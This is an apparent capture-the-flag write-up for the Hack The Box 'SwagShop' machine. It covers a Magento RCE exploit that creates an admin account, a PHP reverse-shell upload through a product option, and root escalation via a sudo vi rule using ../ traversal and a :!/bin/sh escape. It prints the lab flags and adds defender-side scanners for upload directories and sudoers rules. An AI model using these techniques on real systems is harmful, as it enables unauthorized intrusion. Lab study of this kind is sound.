09 Oct 2019 - - Samir Ahmad Malik
+=============+
SCANNING
+=============+
nmap 10.10.10.140
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
+================+
ENUMERATION
+================+
Website hosted on port 80 (HTTP): SwagShop, a shopping site.
It runs the Magento CMS, identified with Wappalyzer.
Found an RCE exploit for Magento:
Command used: searchsploit Magento
Magento eCommerce - Remote Code Execution
/usr/share/exploitdb/exploits/xml/webapps/37977.py
Copy the exploit and edit it, setting your target, e.g.:
target = "http://10.10.10.140/index.php/"
and save it.
Now execute it with:
python exploit.py
It creates an admin account with username "forme" and password "forme".
Now log in at http://10.10.10.140/index.php/admin (found with DirBuster).
I tried to upload a PHP shell, but I couldn't.
Then I found a way: create a new product and add a custom option that asks the user to upload a file with the .php extension.
Now place an order for the created product and upload the php-reverse-shell file.
Then start a multi/handler in msfconsole for the uploaded shell.
The uploaded shell is reachable on the server here:
http://10.10.10.140/media/custom_options/order/p/h/
Found the media folder with DirBuster, then did some searching after uploading the shell.
Set up the listener and catch the reverse shell.
Now navigate to /home/haris/.
The user.txt file there contains the user flag: a448877277e82f05e5ddf9f90aefbac8
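The foothold above works because the custom-option upload lands in a web-served media tree where the PHP handler is still active. As an added, defender-side example (this is not code from the writeup or from Magento), here is a small scanner that walks an upload directory and flags files that are executable by extension, including double extensions such as shell.php.jpg, or that carry a PHP open tag regardless of name. The directory layout and the sample files are constructed to mimic media/custom_options/order/ and are not real data.

```python
import os
import re
import tempfile

# Extensions a PHP handler will typically execute if script execution is
# not disabled for the upload tree (list is an assumption for this example).
EXECUTABLE_EXTS = {".php", ".phtml", ".phar", ".php5", ".php7", ".phps"}
# Matches "<?php" or the short echo tag "<?=" anywhere in the first bytes.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)")


def classify_file(path):
    """Return the reasons a file under an upload directory looks like a script."""
    reasons = []
    name = os.path.basename(path).lower()
    # Check every dotted suffix, so avatar.php.jpg is caught, not only the last one.
    for part in name.split(".")[1:]:
        if "." + part in EXECUTABLE_EXTS:
            reasons.append(f"executable extension .{part}")
            break
    try:
        with open(path, "rb") as fh:
            head = fh.read(4096)
    except OSError:
        return reasons
    if PHP_TAG_RE.search(head):
        reasons.append("PHP open tag in content")
    return reasons


def scan_upload_dir(root):
    """Map each suspicious file (relative to root) to its list of reasons."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            reasons = classify_file(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


def build_sample_media_dir():
    """Constructed sample tree shaped like media/custom_options/order/ (benign contents)."""
    root = tempfile.mkdtemp(prefix="media_")
    order = os.path.join(root, "custom_options", "order", "p", "h")
    os.makedirs(order)
    samples = {
        "photo.jpg": b"\xff\xd8\xff\xe0JFIF constructed jpeg bytes",
        "notes.txt": b"plain text attachment",
        "shell.php": b"<?php echo 'constructed sample'; ?>",
        # Double extension plus a GIF header in front of a short PHP tag.
        "avatar.php.jpg": b"GIF89a<?= 'constructed sample' ?>",
    }
    for fn, body in samples.items():
        with open(os.path.join(order, fn), "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    sample_root = build_sample_media_dir()
    for rel, why in sorted(scan_upload_dir(sample_root).items()):
        print(f"{rel}: {', '.join(why)}")
```

Run it on a cron schedule against the real media directory and alert on any hit; the complementary fix is to serve the media tree with script execution disabled, so that even a file that slips through the upload filter is returned as static content rather than run.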
+=========================+
PRIVILEGE-ESCALATION
+=========================+
Type the command:
sudo -l
Output:
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
This shows that www-data may run the vi editor (/usr/bin/vi) as root, without a password, on any path matching /var/www/html/*. Because the wildcard also matches ../ components, the rule effectively covers any file on the system, and vi can run shell commands from inside the editor.
First create a TTY, since the shell has none. python3 is installed, so the command is:
python3 -c 'import pty;pty.spawn("/bin/sh")'
Now edit a file from the /var/www/html/ directory with vi using sudo; the wildcard does not stop a ../ traversal, so the path can point anywhere:
cd /home/haris
sudo vi /var/www/html/../../../etc/sudoers
Now, in vi, enter command mode and run /bin/sh by typing :!/bin/sh and pressing Enter,
and we got root.
Navigating to the /root/ directory:
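The sudo rule that gave root here combines three weaknesses: NOPASSWD, an editor that can spawn a shell, and a wildcard argument that does not stop ../ traversal. As an added example from the defender's side (not code from the writeup), this Python checker parses sudoers rules of the form shown above and flags each of those properties. The sample rules, the editor list and the sudoedit suggestion are constructed for this example; wildcard_matches() mirrors sudo's argument matching with Python's fnmatch, which, like sudo's argument matching, lets * span a / character.

```python
import fnmatch
import os
import re
import shlex

# Constructed sample sudoers content modelled on the rule shown by `sudo -l`.
SAMPLE_SUDOERS = """
Defaults env_reset, mail_badpass
www-data ALL=(root) NOPASSWD: /usr/bin/vi /var/www/html/*
deploy ALL=(root) NOPASSWD: sudoedit /var/www/html/index.php
backup ALL=(root) /usr/bin/rsync -a /srv/ /mnt/backup/
"""

# Editors that can run shell commands from inside the editor (vi's :! is used on this box).
SHELL_ESCAPE_EDITORS = {"vi", "vim", "view"}

# user host=(runas) [TAG: ...] command args...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$"
)


def parse_rule(line):
    """Parse one user-specification line; return None for Defaults, blanks, etc."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    argv = shlex.split(m.group("cmd"))
    return {
        "user": m.group("user"),
        "runas": m.group("runas"),
        "nopasswd": "NOPASSWD" in m.group("tags"),
        "command": argv[0],
        "args": argv[1:],
    }


def audit_rule(rule):
    """Return human-readable findings for one parsed rule."""
    findings = []
    if rule["nopasswd"]:
        findings.append("NOPASSWD: no authentication required")
    prog = os.path.basename(rule["command"])
    if prog in SHELL_ESCAPE_EDITORS:
        findings.append(f"{prog} allows shell escapes; use sudoedit with explicit file paths instead")
    for arg in rule["args"]:
        if any(ch in arg for ch in "*?["):
            findings.append(
                f"wildcard in argument {arg!r}: '*' also matches '/', so '..' traversal is not blocked"
            )
    return findings


def audit_sudoers(text):
    """Map each rule line to its findings (empty list means nothing flagged)."""
    report = {}
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule:
            report[line.strip()] = audit_rule(rule)
    return report


def wildcard_matches(pattern, argument):
    """Mirror sudo's argument matching (fnmatch without FNM_PATHNAME): '*' spans '/'."""
    return fnmatch.fnmatch(argument, pattern)


if __name__ == "__main__":
    for rule_line, findings in audit_sudoers(SAMPLE_SUDOERS).items():
        print(rule_line)
        for f in findings or ["ok"]:
            print("   -", f)
    print(wildcard_matches("/var/www/html/*", "/var/www/html/../../../etc/sudoers"))
```

Point it at a copy of /etc/sudoers and the files under /etc/sudoers.d; any rule that gets all three findings is the pattern seen on this box, and replacing it with sudoedit over an explicit list of files removes both the shell escape and the traversal at once.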
cd /root
cat root.txt
c2b087d66e14a652a3b86a130ac56721
__
/| |/|| |
/| ´ |.` |\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|_|.__| https://hackthebox.store/password
PS: Use root flag as password!
And we got the flag from the root.txt file: c2b087d66e14a652a3b86a130ac56721
Finish..!!!